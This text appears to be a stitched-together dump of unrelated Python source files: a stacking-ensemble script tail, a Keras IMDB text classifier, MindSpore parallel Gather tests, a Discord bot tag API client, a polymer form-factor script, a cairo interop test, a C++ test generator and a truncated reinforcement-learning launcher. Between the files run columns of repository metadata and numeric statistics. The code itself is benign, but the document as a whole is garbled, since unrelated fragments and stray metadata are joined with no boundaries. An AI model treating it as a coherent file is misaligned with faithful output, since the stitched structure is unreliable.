res = self.stacker.predict(S_test)[:]
return res
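# Shape sketch of the stacking above: with n_splits=5 and the 4 base models used
# below, S_train is (len(X), 4) filled with out-of-fold predictions and S_test is
# (len(T), 4) built from per-fold test predictions averaged over the folds; the
# ElasticNet stacker is then fit on S_train and applied to S_test.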
stack = Ensemble(n_splits=5,
#stacker=ElasticNetCV(l1_ratio=[x/10.0 for x in range(1,10)]),
stacker=ElasticNet(l1_ratio=0.1, alpha=1.4),
base_models=(svm_pipe, en_pipe, xgb_pipe, rf_model))
y_test = stack.fit_predict(train, y_train, test)
df_sub = pd.DataFrame({'ID': id_test, 'y': y_test})
df_sub.to_csv('submission.csv', index=False)
#############################
'''This example demonstrates the use of Convolution1D for text classification.
Gets to 0.89 test accuracy after 2 epochs.
90s/epoch on Intel i5 2.4Ghz CPU.
10s/epoch on Tesla K40 GPU.
'''
from __future__ import print_function
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
from keras.datasets import imdb
# set parameters:
max_features = 5000
maxlen = 400
batch_size = 32
embedding_dims = 50
filters = 250
kernel_size = 3
hidden_dims = 250
epochs = 2
print('Loading data...')
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)
print(len(x_train), 'train sequences')
print(len(x_test), 'test sequences')
print('Pad sequences (samples x time)')
x_train = sequence.pad_sequences(x_train, maxlen=maxlen)
x_test = sequence.pad_sequences(x_test, maxlen=maxlen)
print('x_train shape:', x_train.shape)
print('x_test shape:', x_test.shape)
print('Build model...')
model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
model.add(Embedding(max_features,
embedding_dims,
input_length=maxlen))
model.add(Dropout(0.2))
# we add a Convolution1D, which will learn filters
# word group filters of size filter_length:
model.add(Conv1D(filters,
kernel_size,
padding='valid',
activation='relu',
strides=1))
# we use max pooling:
model.add(GlobalMaxPooling1D())
# We add a vanilla hidden layer:
model.add(Dense(hidden_dims))
model.add(Dropout(0.2))
model.add(Activation('relu'))
# We project onto a single unit output layer, and squash it with a sigmoid:
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(x_test, y_test))
| 31.643243
| 112
| 0.656389
| 1,642
| 11,708
| 4.488429
| 0.227162
| 0.029308
| 0.016418
| 0.010855
| 0.325373
| 0.262687
| 0.191859
| 0.183718
| 0.16228
| 0.153324
| 0
| 0.019026
| 0.214383
| 11,708
| 369
| 113
| 31.728997
| 0.782235
| 0.162965
| 0
| 0.276018
| 0
| 0
| 0.059916
| 0.004747
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049774
| false
| 0
| 0.135747
| 0.004525
| 0.235294
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4036ba021d5a543848f0719df15257dc0be8cd
| 7,239
|
py
|
Python
|
tests/ut/python/parallel/test_manual_gatherv2.py
|
PowerOlive/mindspore
|
bda20724a94113cedd12c3ed9083141012da1f15
|
[
"Apache-2.0"
] | 3,200
|
2020-02-17T12:45:41.000Z
|
2022-03-31T20:21:16.000Z
|
tests/ut/python/parallel/test_manual_gatherv2.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 176
|
2020-02-12T02:52:11.000Z
|
2022-03-28T22:15:55.000Z
|
tests/ut/python/parallel/test_manual_gatherv2.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 621
|
2020-03-09T01:31:41.000Z
|
2022-03-30T03:43:19.000Z
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore as ms
from mindspore import context, Tensor, Parameter
from mindspore.common.api import _cell_graph_executor
from mindspore.nn import Cell, TrainOneStepCell, Momentum
from mindspore.ops import operations as P
from mindspore.common.initializer import initializer
class Net(Cell):
def __init__(self,
strategy1=None,
strategy2=None,
strategy3=None,
axis=0,
init_flag=True,
split_tuple=(4, 4),
split_string="manual_split",
param_shape=(8, 8)):
super().__init__()
self.gatherv2 = P.Gather().shard(strategy1)
self.gatherv2.add_prim_attr(split_string, split_tuple)
self.mul = P.Mul().shard(strategy2)
self.reshape = P.Reshape()
self.matmul = P.MatMul().shard(strategy3)
self.matmul.add_prim_attr("forward_reduce_scatter", True)
if init_flag:
self.param = Parameter(initializer("ones", param_shape, ms.float32), name="gatherv2_param")
else:
self.param = Parameter(Tensor(np.ones(param_shape), dtype=ms.float32), name="gatherv2_param")
self.mul_weight = Parameter(initializer("ones", (8, 8, 8), ms.float32), name="mul_weight")
self.matmul_weight = Parameter(initializer("ones", (64, 16), ms.float32), name="matmul_weight")
self.axis = axis
def construct(self, x, b):
out = self.gatherv2(self.param, x, self.axis)
out = self.mul(out, self.mul_weight)
out = self.reshape(out, (8, 64))
out = self.matmul(out, self.matmul_weight)
return out
_x = Tensor(np.ones([8, 8]), dtype=ms.int32)
_b = Tensor(np.ones([64, 8]), dtype=ms.float32)
def compile_net(net):
optimizer = Momentum(net.trainable_params(), learning_rate=0.1, momentum=0.9)
train_net = TrainOneStepCell(net, optimizer)
train_net.set_auto_parallel()
train_net.set_train()
_cell_graph_executor.compile(train_net, _x, _b, auto_parallel_mode=True)
context.reset_auto_parallel_context()
def test_normal_split():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
compile_net(net)
def test_normal_split2():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=4, global_rank=0)
strategy1 = ((4, 1), (1, 4))
strategy2 = ((1, 4, 1), (1, 4, 1))
strategy3 = ((1, 4), (4, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=(10, 20, 30, 4), param_shape=(64, 8))
compile_net(net)
def test_normal_split3():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=32, global_rank=17)
strategy1 = ((4, 8), (1, 4))
strategy2 = ((1, 4, 8), (1, 4, 8))
strategy3 = ((1, 32), (32, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=(10, 20, 30, 4), param_shape=(64, 8))
compile_net(net)
def test_normal_split_with_offset():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, split_string="manual_split_with_offset", split_tuple=((4, 0), (4, 4)))
compile_net(net)
def test_auto_parallel_error():
context.set_auto_parallel_context(parallel_mode="auto_parallel", device_num=2, global_rank=0)
net = Net()
with pytest.raises(RuntimeError):
compile_net(net)
def test_axis_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, axis=1)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((4, 1), (8, 1))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error2():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((4, 1), (1, 8))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error3():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error4():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 8), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error5():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=4, global_rank=0)
strategy1 = ((4, 1), (1, 4))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_split_tuple_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=((5, 0), (5, 5)))
with pytest.raises(RuntimeError):
compile_net(net)
def test_parameter_use_tensor_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, init_flag=False)
with pytest.raises(RuntimeError):
compile_net(net)
| 37.703125
| 117
| 0.654234
| 1,016
| 7,239
| 4.448819
| 0.17126
| 0.016372
| 0.013274
| 0.014159
| 0.565044
| 0.546018
| 0.540265
| 0.530973
| 0.512389
| 0.49115
| 0
| 0.061707
| 0.194088
| 7,239
| 191
| 118
| 37.900524
| 0.713061
| 0.088134
| 0
| 0.479167
| 0
| 0
| 0.053143
| 0.006985
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.055556
| 0
| 0.180556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4088c9d39d6abd819f54e637798544df93b9db
| 3,396
|
py
|
Python
|
ClemBot.Bot/bot/api/tag_route.py
|
makayla-moster/ClemBot
|
26503d25f1fbe2abcf99dbf0f68b17e88ad11a7c
|
[
"MIT"
] | 121
|
2020-04-25T06:20:28.000Z
|
2021-06-07T03:08:46.000Z
|
ClemBot.Bot/bot/api/tag_route.py
|
makayla-moster/ClemBot
|
26503d25f1fbe2abcf99dbf0f68b17e88ad11a7c
|
[
"MIT"
] | 180
|
2020-04-25T04:49:51.000Z
|
2021-06-22T15:21:30.000Z
|
ClemBot.Bot/bot/api/tag_route.py
|
makayla-moster/ClemBot
|
26503d25f1fbe2abcf99dbf0f68b17e88ad11a7c
|
[
"MIT"
] | 72
|
2020-04-25T03:28:49.000Z
|
2021-06-20T20:17:00.000Z
|
from bot.api.api_client import ApiClient
from bot.api.base_route import BaseRoute
import typing as t
from bot.models import Tag
class TagRoute(BaseRoute):
def __init__(self, api_client: ApiClient):
super().__init__(api_client)
async def create_tag(self, name: str, content: str, guild_id: int, user_id: int, **kwargs) -> t.Optional[Tag]:
json = {
'Name': name,
'Content': content,
'GuildId': guild_id,
'UserId': user_id,
}
tag_dict = await self._client.post('tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def edit_tag_content(self, guild_id: int, name: str, content: str, **kwargs) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
'Content': content
}
tag_dict = await self._client.patch('bot/tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def edit_tag_owner(self, guild_id: int, name: str, user_id: int, **kwargs) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
'UserId': user_id
}
tag_dict = await self._client.patch('bot/tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def get_tag(self, guild_id: int, name: str) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
}
tag_dict = await self._client.get('bot/tags', data=json)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def get_tag_content(self, guild_id: int, name: str) -> t.Optional[str]:
json = {
'GuildId': guild_id,
'Name': name,
}
resp = await self._client.get('bot/tags', data=json)
return None if resp is None else resp['content']
async def delete_tag(self, guild_id: int, name: str, **kwargs):
"""
Makes a call to the API to delete a tag w/ the given GuildId and Name.
If successful, the API will return a dict with the following values:
- name The name of the tag.
- content The content of the tag.
- guildId The guild id the tag was in.
"""
json = {
'GuildId': guild_id,
'Name': name,
}
return await self._client.delete('bot/tags', data=json, **kwargs)
async def add_tag_use(self, guild_id: int, name: str, channel_id: int, user_id: int):
"""
Makes a call to the API to record that a tag w/ the given Name was used.
If successful, the API will return a dict with the following values:
- name The name of the tag.
- guildId The guild id the tag is in.
"""
json = {
'GuildId': guild_id,
'Name': name,
'ChannelId': channel_id,
'UserId': user_id
}
return await self._client.post('bot/tags/invoke', data=json)
async def get_guilds_tags(self, guild_id: int) -> t.Iterator[Tag]:
resp = await self._client.get(f'guilds/{guild_id}/tags')
if not resp:
return []
return [Tag.from_dict(i) for i in resp['tags']]
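# Editor's illustrative sketch (hypothetical helper, not part of ClemBot):
# exercising the routes above, assuming an already-configured ApiClient.
async def _tag_route_example(client: ApiClient) -> None:
    route = TagRoute(client)
    tag = await route.create_tag('greeting', 'Hello!', guild_id=1, user_id=2)
    if tag is not None:
        content = await route.get_tag_content(guild_id=1, name='greeting')
        print(content)
        await route.delete_tag(guild_id=1, name='greeting')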
| 33.294118
| 114
| 0.564193
| 457
| 3,396
| 4.030635
| 0.170678
| 0.068404
| 0.043431
| 0.053203
| 0.652009
| 0.598263
| 0.561346
| 0.4962
| 0.366992
| 0.317047
| 0
| 0
| 0.324794
| 3,396
| 101
| 115
| 33.623762
| 0.803314
| 0
| 0
| 0.506849
| 0
| 0
| 0.073814
| 0.007733
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0
| 0.054795
| 0
| 0.260274
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe40ab7f78d9978c2d19631879cf3439c2112560
| 2,967
|
py
|
Python
|
formfactor_AL.py
|
kirichoi/PolymerConnectome
|
064df932cfca57a97e62dfa9a32d1fa976500906
|
[
"MIT"
] | null | null | null |
formfactor_AL.py
|
kirichoi/PolymerConnectome
|
064df932cfca57a97e62dfa9a32d1fa976500906
|
[
"MIT"
] | null | null | null |
formfactor_AL.py
|
kirichoi/PolymerConnectome
|
064df932cfca57a97e62dfa9a32d1fa976500906
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 10:59:00 2020
@author: user
"""
import numpy as np
import multiprocessing as mp
import matplotlib.pyplot as plt
import time
import itertools
import ctypes
def formfactor(args):
# with AL_dist_flat_glo.get_lock:
AL_dist_flat_glo_r = np.frombuffer(AL_dist_flat_glo.get_obj())
AL_dist_flat_glo_s = AL_dist_flat_glo_r.reshape((n_glo.value,m_glo.value))
# ffq = np.sum(np.cos(np.dot(np.logspace(-2,3,100)[args[0]]*np.array([1,0,0]),
# np.subtract(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1+args[1]:]).T)))
qr = np.logspace(-2,3,100)[args[0]]
rvec = np.subtract(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1+args[1]:]).T
cosx = np.cos(np.dot(qr*np.array([1,0,0]), rvec))
cosy = np.cos(np.dot(qr*np.array([0,1,0]), rvec))
cosz = np.cos(np.dot(qr*np.array([0,0,1]), rvec))
# cosxy = np.cos(np.dot(qr*np.array([0.707,0.707,0]), rvec))
# cosyz = np.cos(np.dot(qr*np.array([0,0.707,0.707]), rvec))
# cosxz = np.cos(np.dot(qr*np.array([0.707,0,0.707]), rvec))
# cosxyz = np.cos(np.dot(qr*np.array([0.577,0.577,0.577]), rvec))
ffq = np.sum(np.mean(np.array([cosx, cosy, cosz]), axis=0))
return ffq
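# Editor's note (sketch of the quantity computed above): for a given q and
# reference point j, ffq sums cos(q * e_axis . (r_j - r_k)) over all later
# points k, averaged over the three axis directions; the __main__ block below
# then sums over j and rescales by n to obtain P(q) on a log-spaced q grid.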
def parallelinit(AL_dist_flat_glo_, n_glo_, m_glo_):
global AL_dist_flat_glo, n_glo, m_glo
AL_dist_flat_glo = AL_dist_flat_glo_
n_glo = n_glo_
m_glo = m_glo_
if __name__ == '__main__':
AL_dist_flat = np.load(r'./AL_dist_flat.npy')
n = np.shape(AL_dist_flat)[0]
m = np.shape(AL_dist_flat)[1]
q_range = np.logspace(-2,3,100)
# r_x = np.array([1, 0, 0])
# q_range_glo = mp.Array(ctypes.c_double, q_range)
AL_dist_flat_glo = mp.Array(ctypes.c_double, AL_dist_flat.flatten())
n_glo = mp.Value(ctypes.c_int, n)
m_glo = mp.Value(ctypes.c_int, m)
# r_x_glo = mp.Array(ctypes.c_double, r_x)
paramlist = list(itertools.product(range(100), range(n)))
pool = mp.Pool(20, initializer=parallelinit, initargs=(AL_dist_flat_glo, n_glo, m_glo))
t1 = time.time()
results = pool.map(formfactor, paramlist)
pool.close()
t2 = time.time()
print(t2-t1)
np.save(r'./AL_results.npy', results)
Pq = 2*np.divide(np.sum(np.array(results).reshape(100, n), axis=1), n)
# fig = plt.figure(figsize=(8,6))
# plt.plot(q_range, Pq, lw=3, color='tab:orange')
# plt.xscale('log')
# plt.xlabel('$q$', fontsize=15)
# plt.ylabel('$P(q)$', fontsize=15)
# plt.tight_layout()
# plt.savefig(r'./AL_form_factor.pdf', dpi=300, bbox_inches='tight')
# plt.show()
fig = plt.figure(figsize=(8,6))
plt.plot(q_range, Pq, lw=3, color='tab:orange')
plt.xscale('log')
plt.yscale('log')
plt.xlabel('$q$', fontsize=15)
plt.ylabel('$P(q)$', fontsize=15)
plt.tight_layout()
plt.savefig(r'./AL_form_factor_log.pdf', dpi=300, bbox_inches='tight')
plt.show()
| 33.337079
| 110
| 0.625211
| 528
| 2,967
| 3.291667
| 0.246212
| 0.069045
| 0.115075
| 0.112198
| 0.574799
| 0.478711
| 0.406214
| 0.372267
| 0.27733
| 0.253165
| 0
| 0.052326
| 0.188406
| 2,967
| 88
| 111
| 33.715909
| 0.669435
| 0.305022
| 0
| 0
| 0
| 0
| 0.047151
| 0.011788
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042553
| false
| 0
| 0.12766
| 0
| 0.191489
| 0.021277
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe427f872414bfa986cd9b2c48b6113399437840
| 1,039
|
py
|
Python
|
utils/tests.py
|
nanodude/cairocffi
|
9d6a9a420a91da80f7901ace9945fd864f5d04dc
|
[
"BSD-3-Clause"
] | null | null | null |
utils/tests.py
|
nanodude/cairocffi
|
9d6a9a420a91da80f7901ace9945fd864f5d04dc
|
[
"BSD-3-Clause"
] | null | null | null |
utils/tests.py
|
nanodude/cairocffi
|
9d6a9a420a91da80f7901ace9945fd864f5d04dc
|
[
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
import io
import cairo # pycairo
import cairocffi
from pycairo_to_cairocffi import _UNSAFE_pycairo_context_to_cairocffi
from cairocffi_to_pycairo import _UNSAFE_cairocffi_context_to_pycairo
import pango_example
def test():
cairocffi_context = cairocffi.Context(cairocffi.PDFSurface(None, 10, 20))
cairocffi_context.scale(2, 3)
pycairo_context = _UNSAFE_cairocffi_context_to_pycairo(cairocffi_context)
cairocffi_context2 = _UNSAFE_pycairo_context_to_cairocffi(pycairo_context)
assert tuple(cairocffi_context.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert tuple(cairocffi_context2.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert tuple(pycairo_context.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert cairocffi_context2._pointer == cairocffi_context._pointer
file_obj = io.BytesIO()
# Mostly test that this runs without raising.
pango_example.write_example_pdf(file_obj)
assert file_obj.getvalue().startswith(b'%PDF')
if __name__ == '__main__':
test()
| 34.633333
| 79
| 0.73821
| 139
| 1,039
| 5.122302
| 0.33813
| 0.179775
| 0.105337
| 0.046348
| 0.296348
| 0.122191
| 0.122191
| 0.122191
| 0.122191
| 0.122191
| 0
| 0.032407
| 0.168431
| 1,039
| 29
| 80
| 35.827586
| 0.791667
| 0.06256
| 0
| 0
| 0
| 0
| 0.012752
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.05
| false
| 0
| 0.3
| 0
| 0.35
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe440692a08637fae6bb18f0a67dbb7336fec900
| 1,909
|
py
|
Python
|
gentable/gen_test_cases.py
|
selavy/studies
|
e17b91ffab193e46fec00cf2b8070dbf1f2c39e3
|
[
"MIT"
] | null | null | null |
gentable/gen_test_cases.py
|
selavy/studies
|
e17b91ffab193e46fec00cf2b8070dbf1f2c39e3
|
[
"MIT"
] | null | null | null |
gentable/gen_test_cases.py
|
selavy/studies
|
e17b91ffab193e46fec00cf2b8070dbf1f2c39e3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import random
N = 32
M = 64
# NOTE: 0 is a reserved value
randu = lambda x: random.randint(1, 2**x-1)
randU32 = lambda: randu(32)
randU64 = lambda: randu(64)
fmt_by_dtype = {
'u32hex': '0x{:08x}',
'u64hex': '0x{:016x}',
}
cpp_by_dtype = {
'u32hex': 'uint32_t',
'u64hex': 'uint64_t',
}
# key = randU32()
# vals = [(key, randU32(), randU64()) for _ in range(N)]
# keys = [(x[0], x[1]) for x in vals]
# success = [random.choice(vals) for _ in range(M)]
# failure = []
keys = [(randU32(),) for _ in range(M)]
vals = [(randU32(), randU64()) for _ in range(N)]
def genval():
y = randU32()
while y in vals:
y = randU32()
return y
miss = [(genval(),) for _ in range(M)]
def print_vector(vals, name, dtypes, indent=0):
indent = ' ' * indent
tabs = indent + ' '
cpptypes = [cpp_by_dtype[dt] for dt in dtypes]
if len(cpptypes) == 1:
cctype = cpptypes[0]
def fmtrow(vs): return vs
else:
cctype = f"std::tuple<{', '.join(cpptypes)}>"
def fmtrow(vs): return f"{{ {vs} }}"
fmts = [fmt_by_dtype[dt] for dt in dtypes]
print(f"{indent}const std::vector<{cctype}> {name} = {{")
rows = [
tabs + fmtrow(', '.join([fmt.format(v) for v, fmt in zip(vs, fmts)])) + ','
for vs in vals
]
print("\n".join(rows))
print(f"{indent}}};")
print('TEST_CASE("Insert random values and look them up", "[gentbl]")')
print('{')
print_vector(keys, name='keys', dtypes=['u32hex'], indent=4)
print()
print_vector(vals, name='vals', dtypes=['u32hex', 'u64hex'], indent=4)
print()
print_vector(miss, name='miss', dtypes=['u32hex'], indent=4)
print()
print('}')
# print("const std::vector<std::tuple<uint32_t, uint32_t, uint64_t>> vs = {")
# for _ in range(N):
# print(" {{ 0x{:08x}, 0x{:08x}, 0x{:016x} }},".format(
# randU32(), randU32(), randU64()))
# print("};")
| 24.474359
| 83
| 0.572027
| 271
| 1,909
| 3.940959
| 0.313653
| 0.02809
| 0.05618
| 0.030899
| 0.169476
| 0.142322
| 0.041199
| 0
| 0
| 0
| 0
| 0.060201
| 0.216867
| 1,909
| 77
| 84
| 24.792208
| 0.654181
| 0.224725
| 0
| 0.102041
| 0
| 0
| 0.182561
| 0.014305
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081633
| false
| 0
| 0.020408
| 0.040816
| 0.122449
| 0.265306
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe449c44aa57e39f59499c7b75ef20b3e5b78b64
| 6,143
|
py
|
Python
|
examples/toy_env/run_toy_env.py
|
aaspeel/deer
|
3ced3695f0ca8537337019d2e3ec0ff8bd346d91
|
[
"BSD-3-Clause"
] | null | null | null |
examples/toy_env/run_toy_env.py
|
aaspeel/deer
|
3ced3695f0ca8537337019d2e3ec0ff8bd346d91
|
[
"BSD-3-Clause"
] | null | null | null |
examples/toy_env/run_toy_env.py
|
aaspeel/deer
|
3ced3695f0ca8537337019d2e3ec0ff8bd346d91
|
[
"BSD-3-Clause"
] | null | null | null |
"""Toy environment launcher. See the docs for more details about this environment.
"""
import sys
import logging
import numpy as np
from deer.default_parser import process_args
from deer.agent import NeuralAgent
from deer.learning_algos.q_net_keras import MyQNetwork
from Toy_env import MyEnv as Toy_env
import deer.experiment.base_controllers as bc
from deer.policies import EpsilonGreedyPolicy
class Defaults:
# ----------------------
# Experiment Parameters
# ----------------------
STEPS_PER_EPOCH = 1000
EPOCHS = 50
STEPS_PER_TEST = 500
PERIOD_BTW_SUMMARY_PERFS = 1
# ----------------------
# Environment Parameters
# ----------------------
FRAME_SKIP = 1
# ----------------------
# DQN Agent parameters:
# ----------------------
UPDATE_RULE = 'rmsprop'
LEARNING_RATE = 0.005
LEARNING_RATE_DECAY = 1.
DISCOUNT = 0.9
DISCOUNT_INC = 1.
DISCOUNT_MAX = 0.99
RMS_DECAY = 0.9
RMS_EPSILON = 0.0001
MOMENTUM = 0
CLIP_NORM = 1.0
EPSILON_START = 1.0
EPSILON_MIN = .1
EPSILON_DECAY = 10000
UPDATE_FREQUENCY = 1
REPLAY_MEMORY_SIZE = 1000000
BATCH_SIZE = 32
FREEZE_INTERVAL = 1000
DETERMINISTIC = True
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
# --- Parse parameters ---
parameters = process_args(sys.argv[1:], Defaults)
if parameters.deterministic:
rng = np.random.RandomState(123456)
else:
rng = np.random.RandomState()
# --- Instantiate environment ---
env = Toy_env(rng)
# --- Instantiate qnetwork ---
qnetwork = MyQNetwork(
env,
parameters.rms_decay,
parameters.rms_epsilon,
parameters.momentum,
parameters.clip_norm,
parameters.freeze_interval,
parameters.batch_size,
parameters.update_rule,
rng)
train_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.1)
test_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.)
# --- Instantiate agent ---
agent = NeuralAgent(
env,
qnetwork,
parameters.replay_memory_size,
max(env.inputDimensions()[i][0] for i in range(len(env.inputDimensions()))),
parameters.batch_size,
rng,
train_policy=train_policy,
test_policy=test_policy)
# --- Bind controllers to the agent ---
# Before every training epoch (periodicity=1), we want to print a summary of the agent's epsilon, discount and
# learning rate as well as the training epoch number.
agent.attach(bc.VerboseController(
evaluate_on='epoch',
periodicity=1))
# During training epochs, we want to train the agent after every [parameters.update_frequency] action it takes.
# Plus, we also want to display, after each training episode (not after every training step), the average Bellman
# residual and the average of the V values obtained during the last episode, hence the two last arguments.
agent.attach(bc.TrainerController(
evaluate_on='action',
periodicity=parameters.update_frequency,
show_episode_avg_V_value=True,
show_avg_Bellman_residual=True))
# At the end of every epoch, one can modify the learning rate using a LearningRateController. Here we
# wish to update the learning rate after every training epoch (periodicity=1), according to the parameters given.
agent.attach(bc.LearningRateController(
initial_learning_rate=parameters.learning_rate,
learning_rate_decay=parameters.learning_rate_decay,
periodicity=1))
# Same for the discount factor.
agent.attach(bc.DiscountFactorController(
initial_discount_factor=parameters.discount,
discount_factor_growth=parameters.discount_inc,
discount_factor_max=parameters.discount_max,
periodicity=1))
# As with the discount factor and the learning rate, one can periodically update the parameter of the epsilon-greedy
# policy implemented by the agent. This controller has a few more capabilities, as it allows one to choose more
# precisely when to update epsilon: after every X actions, episodes or epochs. The parameter can also be reset every
# episode or epoch (or never, hence the reset_every='none').
agent.attach(bc.EpsilonController(
